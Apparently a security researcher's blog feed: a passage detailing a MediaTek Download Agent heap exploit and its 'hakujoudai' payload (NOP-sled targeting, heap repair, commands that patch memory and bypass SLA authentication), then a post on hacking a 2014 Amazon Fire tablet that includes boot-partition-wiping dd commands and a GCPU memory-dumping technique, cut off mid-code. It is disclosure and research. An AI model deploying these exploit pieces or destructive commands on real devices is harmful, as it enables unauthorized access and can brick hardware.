What actually matters is the size of the filename when mxmlLoadString sees it. A 5KB filename of & characters? 5KB node allocation. A 5KB filename of A characters? Same thing.

So we simplified: just send a bunch of As. We started small (1KB, 2KB, 3KB) and kept watching the heap through our hooks until the allocations lined up.

At around 5KB, the XML filename node landed right after our AIO2 buffer, exactly where we needed it.

Same result, far less complexity, though as we later learned, the extra complexity with special characters was intentional obfuscation.

Landing the Shellcode

There's one more challenge we haven't addressed: where exactly does our shellcode land?

The heap base address varies between devices and DA versions. On the Nothing Phone 2A, it starts at 0x4007F100. On other devices, it might be completely different.

And even on the same device, the exact location of our AIO1 buffer depends on what allocations happened before it.

We could try to calculate the exact address by analyzing the DA's initialization sequence, tracking every allocation, and predicting where our shellcode ends up.

But that's fragile: any change in the DA's behavior would break our calculations. Instead, we took the lazy approach: NOP sleds.

The heap is huge, 800MB on every V6 DA we've analyzed. We don't need to land precisely on our shellcode; we just need to land somewhere in front of it.

So we pad our payload with a massive NOP sled (about 10% of the heap size, roughly 80MB of NOPs), then place the actual shellcode at the end. When we overwrite dpc->cb, we point it near the end of the sled, at 95%.

If we land anywhere in the sled, execution slides down through the NOPs until it hits our shellcode. As long as our target address is within the sled, we're good.

We calculate the target address as 95% into the sled, aligned to 4 bytes for ARM:

let sled_size = (heap_params.heap_size / 10) as usize;
let shellcode_addr = (heap_params.heap_base + (sled_size as f64 * 0.95) as u64) & !3;

It's not elegant, but it works reliably across different devices without needing precise heap layout predictions.
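To make the numbers concrete, here is a worked sketch using the Nothing Phone 2A heap base quoted earlier. It assumes "800MB" means 800 MiB and that the sled starts close to the heap base; build_payload is a hypothetical helper, and integer math replaces the floating-point multiply.

```python
HEAP_BASE = 0x4007F100           # Nothing Phone 2A value quoted above
HEAP_SIZE = 800 * 1024 * 1024    # assumption: "800MB" read as 800 MiB
NOP = bytes.fromhex("1f2003d5")  # AArch64 NOP (0xD503201F), little-endian

sled_size = HEAP_SIZE // 10
# Integer form of "95% into the sled", then aligned down to 4 bytes.
target = (HEAP_BASE + (sled_size * 95) // 100) & ~3

def build_payload(shellcode: bytes, sled_bytes: int) -> bytes:
    """NOP sled of roughly sled_bytes, followed by the shellcode."""
    return NOP * (sled_bytes // len(NOP)) + shellcode

print(hex(sled_size), hex(target))
```

The alignment mask matters because every AArch64 instruction is 4 bytes wide, so a misaligned target would fault instead of sliding.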

Hakujoudai

With code execution achieved, we needed a payload that would give us persistent control over the DA. We called it hakujoudai (白杖代).

The name was shomy's idea, it's a reference to Toilet-bound Hanako-kun, where hakujoudai are supernatural orbs used by ghosts to power up, scout, and take control of spaces beyond their reach.

We thought it fit: we corrupt the heap, leave it for dead, then come back to haunt it.

The Problem

After the exploit triggers, we have a problem: the heap is corrupted.

Remember, we overwrote the XML filename buffer's chunk header with a fake pointer to the DPC region. When free() processed this corrupted chunk, it inserted our fake "chunk" into the free list.

Now the heap's free list contains an entry pointing to 0x40070028, which isn't heap memory at all.

If we just ran arbitrary code and returned, the next allocation or free would try to use this corrupted free list and crash. We need to fix the heap before doing anything else.

Fixing the Heap

The first thing hakujoudai does is repair the damage. It walks the free list and validates each entry.

If a chunk's address falls outside the heap region ([heap_base, heap_base + heap_size]), it's invalid and gets unlinked:

while (iterations++ < max_iter) {
    bool valid = ptr_valid((uintptr_t)curr, (uintptr_t)head, end);
    
    if (valid) {
        // Keep this chunk in the list
        last_valid->next = curr;
        curr->prev = last_valid;
        last_valid = curr;
    } else {
        // Invalid chunk, skip it and clear DPC if needed
        if ((uintptr_t)curr <= base || (uintptr_t)curr > end)
            clear_dpc((uintptr_t)curr);
    }
    
    curr = next;
}

When we encounter our fake chunk (pointing to DPC), we also clear the DPC structure to prevent the callback from firing again:

static void clear_dpc(uintptr_t corrupted_node)
{
    uintptr_t dpc_key_addr = corrupted_node + DPC_KEY_OFFSET;
    memset((void *)dpc_key_addr, 0, DPC_CLEAR_SIZE);
}
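The idea behind the repair can be sketched without any pointers at all. This is a simplified model, not the payload's logic: repair_free_list is hypothetical, the free list is flattened into a list of addresses, and relinking is implied by the order of the kept entries.

```python
def repair_free_list(nodes, heap_base, heap_size):
    """Split free-list entries into those inside the heap and those outside."""
    heap_end = heap_base + heap_size
    kept, dropped = [], []
    for addr in nodes:
        (kept if heap_base <= addr < heap_end else dropped).append(addr)
    return kept, dropped

kept, dropped = repair_free_list(
    [0x4008_0000, 0x4007_0028, 0x4009_0000],  # middle entry is the fake chunk
    heap_base=0x4007_F100,
    heap_size=800 * 1024 * 1024,
)
print([hex(a) for a in kept], [hex(a) for a in dropped])
```

The dropped entry is the one that points at the DPC region, which is why the payload also wipes the DPC structure when it finds it.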

Custom Commands

With the heap fixed, we can safely use the DA's API. Instead of reimplementing USB communication from scratch, we hook into the existing command system:

register_major_command("CMD:BOOT-TO", "1", cmd_boot_to);
register_major_command("CMD:EXP-CALL-FUNC", "1", cmd_call_function);
register_major_command("CMD:EXP-PATCH-MEM", "1", cmd_patch_mem);

These three commands give us everything we need:

CMD:BOOT-TO: Downloads and executes DA extensions, second-stage payloads that add functionality to the exploited DA.
CMD:EXP-PATCH-MEM: Writes arbitrary data to any address. Penumbra uses this to patch out security checks directly.
CMD:EXP-CALL-FUNC: Calls any function at a given address. On devices with DA SLA enabled, most commands are only registered after authentication. We use this to invoke the registration function directly, unlocking all commands without passing SLA.

Returning to the Command Loop

The final trick: instead of spinning in our own loop, we return to the DA's original command loop:

dagent_command_loop2();

This means the DA continues running normally, processing commands as usual, except now it also responds to our custom commands. From the host's perspective, it's still talking to a standard V6 DA, just with a few extra capabilities.

Dynamic Address Resolution

You might have noticed the function pointers look suspicious:

static void (*const volatile register_major_command)(...) = (void *)0x11111111;
static void (*const volatile dagent_command_loop2)(void) = (void *)0x22222222;
static volatile uintptr_t heap_struct = 0x33333333;

These are placeholders. Before sending the payload, penumbra analyzes the target DA binary and patches these addresses with the real values:

patch_pattern_str(&mut payload_bin, "11111111", &bytes_to_hex(&params.reg_cmd.to_le_bytes()))?;
patch_pattern_str(&mut payload_bin, "22222222", &bytes_to_hex(&params.cmd_loop.to_le_bytes()))?;
patch_pattern_str(&mut payload_bin, "33333333", &bytes_to_hex(&params.theheap.to_le_bytes()))?;
// ... etc

This makes hakujoudai work across different DA versions without hardcoding addresses.
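A minimal sketch of the same idea, assuming the placeholders appear in the binary as 32-bit little-endian values and that DA addresses fit in 32 bits. patch_placeholder is a hypothetical helper, not penumbra's patch_pattern_str, and the payload bytes and address are made up.

```python
import struct

def patch_placeholder(blob: bytes, placeholder: int, real_addr: int) -> bytes:
    """Replace one 32-bit little-endian placeholder with the resolved address."""
    needle = struct.pack("<I", placeholder)
    if blob.count(needle) != 1:
        raise ValueError(f"expected exactly one {placeholder:#x} placeholder")
    return blob.replace(needle, struct.pack("<I", real_addr))

# Hypothetical payload bytes and address, for illustration only.
payload = b"\x00" * 4 + struct.pack("<I", 0x11111111) + b"\xff" * 4
patched = patch_placeholder(payload, 0x11111111, 0x40012345)
print(patched.hex())
```

Refusing to patch when the pattern is missing or ambiguous is a cheap guard against silently shipping a payload with a stale address.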

Results

We integrated everything into penumbra. It parses the DA to extract addresses, calculates heap parameters, builds the payload with the right offsets, and sends it off.

Here's what it looks like from the host:

And on UART, hakujoudai doing its thing, fixing the heap and registering our commands:

After that, penumbra patches out security checks and proceeds normally. Full read/write access, no auth required :)!

From here you can dump partitions, flash images, or unlock the bootloader on devices where the stock DA would otherwise block you.

Fixes

MediaTek patched both vulnerabilities sometime in 2025. We don't know the exact date, but we found two CVEs that appear to match:

CVE-2025-20658: In DA, there is a possible permission bypass due to a logic error. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: ALPS09474894)
CVE-2025-20656: In DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: ALPS09625423)

We suspect the first one corresponds to the USB overflow since the loop condition was technically correct but logically flawed.

And the second one matches the XML expansion overflow since it lacked proper bounds checking when writing to the destination buffer.

However, these are just our assumptions based on the descriptions so take them with a grain of salt.

XML Expansion Fix

The mxml_escape function now allocates a properly sized buffer and checks for overflow before each write:

#define DEST_BUFFER_SIZE (MAX_FILE_NAME_LEN * 6)

if (dest == NULL)
    dest = (char *)malloc(DEST_BUFFER_SIZE);

// ...

for (; i < len; ++i) {
    if ((p - dest) >= (DEST_BUFFER_SIZE - 6)) {
        LOGE("Dest XML file name buffer overflow");
        return "";
    }
    // ... expansion logic ...
}

The buffer is now MAX_FILE_NAME_LEN * 6 to account for worst-case expansion (all " characters becoming &quot;), and it bails out if there's not enough space for another expansion.
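The factor of 6 comes from the longest entity: a single " expands to the six characters of &quot;. The sketch below mimics the shape of the patched guard; the entity table is the standard XML one and is an assumption about what the DA actually escapes, and escape_bounded is a hypothetical name.

```python
ENTITIES = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;"}
MAX_EXPANSION = max(len(e) for e in ENTITIES.values())  # 6, from &quot;

def escape_bounded(name: str, max_name_len: int) -> str:
    """Escape `name`, refusing to go past a buffer of max_name_len * 6 chars."""
    limit = max_name_len * MAX_EXPANSION
    out = []
    used = 0
    for ch in name:
        if used >= limit - MAX_EXPANSION:  # same guard shape as the patched DA
            return ""                      # bail out instead of overflowing
        piece = ENTITIES.get(ch, ch)
        out.append(piece)
        used += len(piece)
    return "".join(out)

print(escape_bounded('a"b', max_name_len=8))
```

Checking before each write, rather than once up front, means the function stays safe even if the caller passes a name longer than the assumed maximum.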

USB Overflow Fix

The fp_read_host_file function now calculates the correct number of bytes to read instead of blindly using package_len:

while (xfered < total_length) {
    // ...
    
    len = total_length - xfered;
    len = len >= package_len ? package_len : len;
    
    if (channel->read(buf + xfered, (uint32_t *)&len) != 0) {
        // ...
    }
    // ...
}

Instead of len = package_len, it now calculates the remaining bytes (total_length - xfered) and uses whichever is smaller. This prevents reading more data than the buffer can hold.

The loop condition also changed to prevent issues if xfered somehow overshoots total_length.
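The clamping logic is small enough to model directly. This sketch assumes every read returns exactly the requested length; chunk_lengths is a hypothetical helper that lists the sizes the patched loop would ask for.

```python
def chunk_lengths(total_length: int, package_len: int):
    """Yield the length requested for each read in the patched loop."""
    xfered = 0
    while xfered < total_length:
        remaining = total_length - xfered
        length = package_len if remaining >= package_len else remaining
        yield length
        xfered += length

print(list(chunk_lengths(0x13FC, 0x1000)))  # [4096, 1020]
```

The requested sizes always add up to total_length, so the buffer can no longer be overrun by an oversized final chunk.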

Conclusion

This was my first time diving into heap exploitation, and honestly, it was a lot of fun. Frustrating at times, especially those hours wasted on the XML overflow, but incredibly rewarding once everything clicked.

Working with shomy made the whole process more enjoyable. Neither of us had done anything like this before, so it was a lot of trial and error, and "wait, what if we try this?" moments. Somehow it all came together!

Big thanks to @AntiEngineer for the UART work and all the help along the way. Also thanks to @erdilS for lending us the Chimera license that started this whole rabbit hole.

And of course, credit where it's due, the Chimera team found the vulnerability, and even though their obfuscation had us chasing ghosts for a while, they deserve recognition for the original discovery.

The full exploit is available in penumbra and the hakujoudai payload in mtk-payloads!

Feel free to reach out on Telegram or mail if you have questions regarding the exploit (technical ones, please, not "how do I unbrick my bricked XYZ.").

Thanks for reading! If you made it this far, we hope it was worth it!

Hacking a 2014 tablet... in 2024!

Sun, 21 Jul 2024 00:00:00 GMT

Yes, you heard that right, 10 years after its release, I managed to hack and unlock the first MediaTek based Amazon tablet that went on sale, the Amazon Fire HD6 / HD7 2014 (codenamed ariel).

In this article, I'll explain my journey in detail without making it too long. If you prefer to skip ahead and see the source code directly (no judgment, I don't like to read or write much either), you can find it here!

R0rt1z2/amonet (branch mt8135-ariel): Amonet fork for MT8135 based devices

Introduction

You might be wondering why I decided to tinker with such an old device, especially after so much time has passed since its release. The reason is simple: its SoC. While MediaTek devices are quite common, this tablet features a unique SoC, the MT8135.

So, what's so special about it? Well, nothing much, really. It feels like a tablet version of the MT6595, which was used in phones like the Meizu MX4. The real interest lies in the fact that no one has managed to unlock this device due to its unique quirks, which we'll see as the article develops.

Getting the device

Although it may sound stupid, the first problem I encountered was finding the device, as it was never sold in Spain. In total, throughout my journey, I acquired two HD7s and two HD6s (one of which eventually died).

The first unit, an HD6, was purchased from Wallapop, a popular platform for buying and selling second-hand products in Spain. The two HD7s were bought from eBay and imported directly from the U.S., which cost me quite a bit. The other HD6 was generously donated by kip_dynamite, to whom I owe a huge thanks.

Analyzing the firmware

As seen on other Amazon devices, this tablet runs a heavily modified version of Android called FireOS. To my surprise, it was released with FireOS 4 (based on Android 4) but received an update to FireOS 5 (based on Android 5.1.1).

Given that this is such an old device, I assumed its firmware would be similar to the 2015 Fire 7. So, I proceeded to download the latest stock firmware available for this device and extracted it. The result surprised me because something very important seemed to be missing... or at least that was my initial impression.

r0rt1z2@r0rt1z2-pc:~/Downloads/update$ tree -L 2
.
├── boot.img
├── file_contexts
├── images
│   ├── lk.bin
│   └── tz.img
├── META-INF
│   ├── CERT.RSA
│   ├── CERT.SF
│   ├── com
│   └── MANIFEST.MF
├── ota.prop
├── system
│   └── build.prop
├── system.new.dat
├── system.patch.dat
└── system.transfer.list

5 directories, 12 files

In case you haven't noticed, the Preloader image is missing. As I mentioned before, this device has quite a few special quirks, and this is one of them.

After realizing the Preloader was missing, I decided to do some research and came across an XDA thread that provided the location of TX and included a few UART logs from an HD6. Fortunately, one of the log links was still working, allowing me to understand how the boot chain worked on this device.

[PL0] Build Time: 20140829-000812

That is the very first line of the log. It looks like the Preloader printing its build time, but what does that 0 stand for? If we read a few more lines, we can find the answer to that question:

[PL0] Build Time: 20140925-030705 
[SD0] Bus Width: 1 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(0) DDR(0) DIV(193) DS(0) RS(0) 
[SD0] Switch to High-Speed mode! 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(2) DDR(1) DIV(96) DS(0) RS(0) 
[SD0] Bus Width: 8 
[SD0] Size: 14910 MB, Max.Speed: 52000 kHz, blklen(512), nblks(30535680), ro(0) 
[SD0] Initialized 
[SD0] SET_CLK(52000kHz): SCLK(50000kHz) MODE(2) DDR(1) DIV(0) DS(0) RS(0) 
msdc_ett_offline_to_pl: size<2> m_id<0x15> 
msdc <0> <HYNIX > <MAG2GC> 
msdc <1> <xxxxxx> <MAG2GC> 
msdc failed to find 
=========use hc erase size 
[PL0] Init MMC: OK(0) 
[ROM_INFO] 'v2','0x3100000','0x20000','0x3D80000','0x2C00' 
[PART] 1: 00000100 00000040 'PRO_INFO' 
[PART] 2: 00002000 00000800 'PMT' 
[PART] 3: 00002800 00002800 'TEE1' 
[PART] 4: 00002800 00005000 'TEE2' 
[PART] 5: 00000400 00007800 'UBOOT' 
[PART] 6: 00004000 00007C00 'boot_x' 
[PART] 7: 00004000 0000BC00 'recovery_x' 
[PART] 8: 00000800 0000FC00 'KB' 
[PART] 9: 00000800 00010400 'DKB' 
[PART] 10: 00000400 00010C00 'MISC' 
[PART] 11: 00008000 00011000 'persisbackup' 
[PART] 12: 00258000 00019000 'system' 
[PART] 13: 0019A000 00271000 'cache' 
[PART] 14: 0000F000 0040B000 'boot' 
[PART] 15: 0000F000 0041A000 'recovery' 
[PART] 16: 018F3FDF 00429000 'userdata' 
[PL0] loading partition 'TEE1' offset=00300000 at address=12001000 
[PART] Image with part header 
[PART] name : PL1 
[PART] addr : FFFFFFFFh 
[PART] size : 112636 
[PART] magic: 58881688h 
[PART] load "2" from 0x0000000001800200 (dev) to 0x12001000 (mem) [SUCCESS] 
[PART] load speed: 21999KB/s, 112636 bytes, 5ms 
[PL0] Load PL1 from  partition 'TEE1'@ 8X: err=3145728 
[PL0]RSA2048 signature for PL1[key0]: (img_size 112380) 
[PL0]image verification passed for PL1[key0] 
[PL0] PL1 Load OK from TEE1: err=0 
[PL0] jump to 12001000

Apparently, the Preloader is divided into two different stages:

PL0: This stage initializes the eMMC, sets up the clock and bus width, and parses the GPT to identify partitions. It then loads and verifies PL1 from the TEE1 partition before jumping to execute it.
PL1: This stage initializes the PMIC, I2C, performs hardware checks, sets up the RTC, DRAM, and initializes the boot device. It then verifies and loads LK and TEE images, performs cryptographic checks, and sets up the boot arguments. Finally, it jumps to the TEE image to continue the boot process.

With this information, I extracted the latest PL1 image from the tz.img we previously downloaded. Knowing its offset is 0x00300000 (as seen in the UART log), I used UNIX dd to cut the image:

r0rt1z2@r0rt1z2-pc $ dd if=tz.img of=PL1.img bs=1 skip=$((0x300000))
113328+0 records in
113328+0 records out
113328 bytes (113 kB, 111 KiB) copied, 0.234714 s, 483 kB/s
r0rt1z2@r0rt1z2-pc $ hexdump -C PL1.img | head -n5
00000000  88 16 88 58 b0 b8 01 00  50 4c 31 00 00 00 00 00  |...X....PL1.....|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00  ff ff ff ff ff ff ff ff  |................|
00000030  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
r0rt1z2@r0rt1z2-pc: $

Success! We've obtained a clean dump of the second Preloader stage image. Regarding the other parts of the firmware, everything was similar, if not identical, to the Fire 7 2015. Both LK and the rest of the TZ function the same way, and FireOS has the same structure. For those interested, I have uploaded a full dump on my dumpyard.
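The first bytes of the hexdump line up with the fields printed in the UART log (magic, size, name, addr). Here is a minimal parsing sketch; the field offsets are inferred from those two outputs rather than taken from any official header definition, and parse_part_header is a hypothetical helper.

```python
import struct

# First 0x30 bytes of PL1.img, copied from the hexdump above.
HEADER = bytes.fromhex(
    "88168858b0b80100504c310000000000"
    "00000000000000000000000000000000"
    "0000000000000000ffffffffffffffff"
)

def parse_part_header(raw: bytes) -> dict:
    """Decode magic, size, name and load address (layout inferred, see text)."""
    magic, size = struct.unpack_from("<II", raw, 0)
    name = raw[8:40].split(b"\x00", 1)[0].decode("ascii")
    (addr,) = struct.unpack_from("<I", raw, 40)
    return {"magic": magic, "size": size, "name": name, "addr": addr}

info = parse_part_header(HEADER)
print({k: (hex(v) if isinstance(v, int) else v) for k, v in info.items()})
```

The decoded size is 112816 bytes, which is exactly 512 less than the 113328 bytes dd copied, so a 512-byte header in front of the image would be consistent with both numbers.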

Rooting the device

To play it safe, I thought it would be best to root the device. Before acquiring it, I read XDA and informed myself about the available options.

The latest versions of FireOS 5 are not rootable, but it's always possible to downgrade (without bricking) to FireOS 4.5.3 and root from there using KingoRoot (yes, I hate these one-click root solutions too; they are the worst).

The problem with this method is that KingoRoot requires an internet connection. If you connect to some Wi-Fi while on 4.5.3, Amazon will automatically (and instantly) download a software update and subsequently install it, causing a hard brick on the device (I'm speaking from experience :D).

To avoid this, I decided to sniff out and extract whatever KingoRoot's black magic is, and put everything together into a ZIP file to create a safe offline rooting method. This method directly installs SuperSU instead of the usual Chinese bloatware! I won't go into details here, but if you want to see how it works, check out this XDA thread.

shell@ariel:/data/local/tmp $ su
root@ariel:/data/local/tmp # id
uid=0(root) gid=0(root) context=u:r:init:s0
root@ariel:/data/local/tmp #

(g0t r00t!)

Accessing UART

As I mentioned earlier, an XDA user had posted the TX location on the HD6 board a few years ago, which made my life easier.

I decided to open up my HD7 to try to solder the TX connection, allowing me to more easily debug amonet, as UART is usually necessary for this process. I opened the back of the device and the first thing I found was a completely different PCB layout, which scared the hell out of me. Did this mean that finding the TX would not be as easy as I had hoped?

Thankfully, my fears were unfounded. In the picture posted by the XDA user, you could see that the TX was part of what looked like a JTAG test point labeled JDEBUG1. After a quick inspection of my HD7 board, I noticed the same label was present so my partner helped me to solder the pin in the same position as shown in the XDA image.

To be able to close the back of the tablet, we made a hole in the right side of the chassis and carefully passed both cables through it. The result was pretty solid, and it still holds up just fine as I'm writing this article!

I plugged in the device and... voila! UART was working just fine, and I was able to read the output of PL0, PL1 and the rest of the bootloader images:

[21:50:51.343] Waiting for tty device..
[21:50:56.839] Connected to /dev/ttyUSB0
[PL0] Build Time: 20140925-030705
[SD0] Bus Width: 1

Accessing bootROM mode

Typically, on such devices, we'd use the first stage of amonet, which exploits a vulnerability in bootROM to upload and execute custom payloads. However, to do this, we'd need to access USBDL mode first, which is something nobody has been able to achieve on this particular device.

Volume keys

I decided to run strings on the previously extracted PL1 image to check for any references to USBDL mode, and I found the following:

r0rt1z2@r0rt1z2-pc:~$ strings PL1.img | grep -e "emergency" -e "download"
%s exit emergency dl mode due to time-out (%d ms, %d ms)
download keys are pressed
[RTC] clear emergency dl mode flag in rtc register
[RTC] emergency dl mode flag in rtc register is detected
%s emergency download mode(timeout: %ds).
[RTC] use pl dl mode for emergency dl mode
r0rt1z2@r0rt1z2-pc:~$

Technically, if the image wasn't lying, this mode should be accessible through the volume rocker, similar to the first versions of the Fire 7 2015's Preloader. So, I decided to give it a try:

r0rt1z2@r0rt1z2-pc:~$ lsusb | grep MT
Bus 003 Device 007: ID 0e8d:3000 MediaTek Inc. MT65xx Preloader
r0rt1z2@r0rt1z2-pc:~$ lsusb

After a few tries, I concluded that no MT6227 device (which is how the bootROM identifies itself) showed up at all, so this probably got patched by Amazon :(

Erasing Preloader from the eMMC

The next thing I tried was quite risky, but as we say in Spanish, "quien tenga miedo a morir, que no nazca" (those who fear death should not be born). It involves erasing /dev/block/mmcblk0boot0 so that bootROM fails to load the Preloader and falls back to USBDL mode:

root@ariel:/ $ echo 0 > /sys/block/mmcblk0boot0/force_ro 
root@ariel:/ $ dd if=/dev/zero of=/dev/block/mmcblk0boot0 bs=512 count=8
8+0 records in
8+0 records out
4096 bytes transferred in 0.001 secs (4096000 bytes/sec)
root@ariel:/ $ echo -n EMMC_BOOT > /dev/block/mmcblk0boot0
root@ariel:/ $ reboot -p

... and it booted back to the OS, as if nothing happened! I double checked mmcblk0boot0 and it remained intact so... what exactly is going on here?

After hours of research, I discovered that the persisbackup partition seemed to contain factory logs from when the device was first programmed and this is what I found:

Boot Area Write protection [BOOT_WP]: 0x04
  Power ro locking: possible
  Permanent ro locking: possible
  partition 0 ro lock status: locked permanently
  partition 1 ro lock status: not locked

Looks like Amazon locked down the first stage of Preloader on purpose... but why? That's something I discovered after hard bricking my Fire HD6.

Shorting the eMMC

I really didn't want to go to this extreme, as I only had my first HD6 at the time, but I decided to be brave and disassemble the device. Considering this method is meant to work in 100% of cases unless USBDL mode was disabled, I wondered: this is a 2014 device—did Amazon really disable it, like on newer models?

As seen in the picture (courtesy of iFixit), everything is protected (or covered) by a soldered metal shield, so I had to use my soldering iron. Since I'm not very skilled at soldering, I asked my partner, who has excellent soldering skills, to help me with this.

The result was fairly good, except for the fact that we accidentally ripped off what seemed to be a capacitor related to the screen.

After that, I started playing the lottery (a very bad mistake—DON'T ever try this at home) with what I thought could be CLK, CMD, or even DAT0. Unfortunately, after a few shorts, I ended up killing the device to the point where it wouldn't even try to boot. So, there goes my first unit :D

UART. What's going on?

Since we had already found TX (which is enough to read UART logs), I decided to see what was happening when trying to access USBDL mode, either by shorting or using the volume rocker. Here's what I discovered:

key 1 is pressed
[LIB] invalid susbdl config '0xEA000007'
<ASSERT> seclib_dl.c:line 62 0
[PLFM] preloader fatal error...

That's what happens when you press the volume down key while connecting the device to the PC. Apparently, the Preloader detects the key press and triggers an assert, which should cause a reboot to bootROM mode. Unfortunately, in my case, it rebooted normally :(

Exploiting the Preloader

Having concluded that USBDL mode was not accessible, I decided to focus on exploiting the Preloader to gain arbitrary code execution and subsequently upload my own payloads.

Since we know that both the Preloader and bootROM support the same commands, I decided to use the same method as the one employed for the Fire HD8 2018, which exploited the GCPU to read and write memory addresses arbitrarily.

My initial goal was to dump the bootROM, but as you'll see later, I failed miserably. However, I did manage to achieve code execution in the Preloader, which is a significant result nonetheless. :)

What's bootROM?

After the CPU initializes, the internal SRAM controller pushes a jump instruction to the bootROM address. This is the first code that runs on the device, and it can't be modified. The bootROM takes care of initializing basic hardware such as flash storage, UART1 (the first serial port), loading the Preloader into the On-Chip SRAM, and jumping to it.

While bootROM is usually located at 0x0, there are certain cases where that address contains a direct jump to either 0x00400000 or 0x48000000, as seen in bypass_payloads.

r0rt1z2@r0rt1z2-pc:~ $ hexdump -C 6572_0x0.bin | head -n 1
00000000  04 f0 1f e5 00 00 40 00  00 00 00 00 00 00 00 00  |......@.........|
r0rt1z2@r0rt1z2-pc:~ $

As seen above, the MT6572 contains the instruction 04 f0 1f e5, which translates (HEX -> ARM) to LDR pc, [pc, #-4]. This instruction loads the value from address 0x4 into the program counter (PC). Since this value is 0x00400000, the instruction effectively redirects execution to the actual bootROM code.
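
The decoding above can be reproduced with a few lines of Python. This is only a sketch: decode_ldr_pc_literal is a helper name I made up, and it handles nothing but this one instruction form (a PC-relative LDR into pc in ARM state):

```python
import struct


def decode_ldr_pc_literal(blob, insn_addr=0):
    """Decode an ARM `LDR pc, [pc, #imm]` at insn_addr and return the jump target."""
    (insn,) = struct.unpack_from("<I", blob, insn_addr)
    # Everything except the U bit (bit 23) and the 12-bit immediate must match:
    # cond=AL, immediate offset, pre-indexed, word load, Rn=pc, Rd=pc.
    if (insn & 0xFF7FF000) != 0xE51FF000:
        raise ValueError(f"not an LDR pc, [pc, #imm]: 0x{insn:08x}")
    offset = insn & 0xFFF
    if not (insn & (1 << 23)):  # U bit clear means the offset is subtracted
        offset = -offset
    literal_addr = insn_addr + 8 + offset  # in ARM state, pc reads as insn address + 8
    (target,) = struct.unpack_from("<I", blob, literal_addr)
    return target


# First 16 bytes of the MT6572 dump shown above.
vector = bytes.fromhex("04f01fe5000040000000000000000000")
target = decode_ldr_pc_literal(vector)
print(f"jump target: 0x{target:08x}")
```

The pc + 8 detail is why an offset of -4 ends up pointing at address 0x4 and not at some address before the instruction.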

Dumping bootROM is no easy task, as it requires you to do so within a privileged context. To understand what I mean, let's take a look at the ARM developer documentation:

In the ARMv7 architecture, the processor mode can change under privileged software control or automatically when taking an exception. When an exception occurs, the core saves the current execution state and the return address, enters the required mode, and possibly disables hardware interrupts.

Applications operate at the lowest level of privilege, PL0, previously unprivileged mode. Operating systems run at PL1, and the Hypervisor in a system with the Virtualization extensions at PL2. The Secure monitor, which acts as a gateway for moving between the Secure and Non-secure (Normal) worlds, also operates at PL1.

To make things easier to understand, let's just say that on the MT8135, which is ARMv7-based, both the Preloader and the TEE run at the most privileged state. Meanwhile, the Little Kernel (second bootloader) and the kernel operate at a lower privilege level.

Understanding the GCPU exploit

The GCPU is a SoC peripheral designed for decrypting encrypted media, featuring a microcontroller core (Control CPU or CCPU) equipped with ROM, SRAM, and hardware accelerators for various cryptographic algorithms including AES, SHA, MD5, RC4, DES, CRC32, and DMA.

The Control CPU (its microcontroller core) operates with a 22-bit instruction set and includes 32 general-purpose 32-bit registers, instruction ROM, instruction RAM, and data RAM.

Direct interaction with the GCPU is achieved by writing to its memory-mapped registers within the SoC's address space. During the boot process, at least on Amazon devices, both the Preloader and the LK (bootloader) use the GCPU to verify the integrity of the images before loading them into memory. As usual, further reverse engineering of this process can provide deeper insights into the GCPU's functionality :)

In my first attempts to dump bootROM, I didn't have arbitrary code execution capabilities in the LK. Thus, my access to the GCPU was solely through the Preloader.

For my device, an older Preloader version exposed two commands to read and write memory addresses within a predefined range: CMD_READ32 and CMD_WRITE32.

As seen in the amonet source code, these can be used to read from and write to the GCPU's registers, and thus trigger cryptographic operations.

To grasp how bootROM data was successfully dumped back then, we need to delve into the intricacies of AES-CBC (Cipher Block Chaining) mode utilized during the decryption processes.

Reading data

AES-CBC mode is a common encryption technique where data is encrypted block by block. Each block of data is XORed with the ciphertext of the previous block before it is encrypted.

During decryption, each block of ciphertext is decrypted and then XORed with the previous block's ciphertext to reconstruct the plaintext. The very first block, however, uses an Initialization Vector (IV) in place of previous ciphertext, setting the stage for the encryption or decryption sequence.

In this scenario, the attacker sets the IV to zero. XORing with zero changes nothing, so the first block comes out exactly as the AES decryption produced it, without any alterations.

For example, let's consider a situation where at address 0x0 the data looks like this:

0xDEADBEEFCAFEBABE13371337DEADBEEFCAFEBABE13371337DEADBEEFCAFEBABE

This data represents two blocks of encrypted information (16 bytes each, given typical AES block size). If we set the IV to zero, the decryption would proceed as follows:

Decryption of the first block:
- Ciphertext Block (C1): DEADBEEFCAFEBABE13371337DEADBEEF
- IV: 00000000000000000000000000000000 (set to zero)
- Assume the AES decryption of C1 produces a block we'll call D1
- Plaintext Result (P1): Since the IV is zero, P1 is equal to D1
  - (Normally, you'd see an XOR step here, but with an IV of zero, it simply doesn't alter the output)
Decryption of the second block:
- Ciphertext Block (C2): CAFEBABE13371337DEADBEEFCAFEBABE
- IV: DEADBEEFCAFEBABE13371337DEADBEEF (previous ciphertext block)
- Assume the AES decryption of C2 produces a block we'll call D2
- Plaintext Result (P2): The decrypted output D2 is XORed with the previous ciphertext C1
  - (The XOR operation mixes D2 with the first block's ciphertext, revealing the plaintext for this block)

With the IV set to zero, the first block's plaintext is directly revealed, and each subsequent block's decryption is influenced by the ciphertext of the block before it. This is essentially what allowed xyz to dump the bootROM in chunks of 16 bytes at a time, since one could read out the generated plaintext after the first block was decrypted.
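
The chaining described above can be checked with a small sketch. Python's standard library has no AES, so toy_block_decrypt below is a made-up stand-in for the real block cipher (it is NOT AES); only the CBC bookkeeping around it is the point here:

```python
BLOCK = 16


def xor_bytes(a, b):
    """XOR two equally sized byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_decrypt(block):
    """Stand-in for AES block decryption (NOT real AES): reverse the bytes and flip every bit."""
    return bytes(b ^ 0xFF for b in reversed(block))


def cbc_decrypt(ciphertext, iv, block_decrypt=toy_block_decrypt):
    """Plain CBC decryption: P[i] = D(C[i]) XOR C[i-1], with the IV acting as C[-1]."""
    plaintext = b""
    previous = iv
    for off in range(0, len(ciphertext), BLOCK):
        block = ciphertext[off:off + BLOCK]
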